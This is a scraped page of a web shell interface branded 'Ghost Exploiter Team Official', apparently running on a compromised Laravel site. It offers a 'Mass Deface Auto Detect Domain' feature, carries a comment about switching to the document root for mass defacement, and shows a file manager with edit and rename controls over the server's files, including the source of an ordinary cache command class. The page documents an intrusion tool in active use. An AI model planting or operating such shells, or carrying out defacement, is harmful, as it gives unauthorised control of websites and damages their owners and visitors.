webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Cache
/
Console
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
stubs
--
ren
CacheTableCommand.php
0.853KB
edt
ren
ClearCommand.php
3.363KB
edt
ren
ForgetCommand.php
1.277KB
edt
ren
PruneStaleTagsCommand.php
1.417KB
edt
ren
<?php namespace Illuminate\Cache\Console; use Illuminate\Console\MigrationGeneratorCommand; use Symfony\Component\Console\Attribute\AsCommand; #[AsCommand(name: 'cache:table')] class CacheTableCommand extends MigrationGeneratorCommand { /** * The console command name. * * @var string */ protected $name = 'cache:table'; /** * The console command description. * * @var string */ protected $description = 'Create a migration for the cache database table'; /** * Get the migration table name. * * @return string */ protected function migrationTableName() { return 'cache'; } /** * Get the path to the migration stub file. * * @return string */ protected function migrationStubFile() { return __DIR__.'/stubs/cache.stub'; } }
<=Back
Liking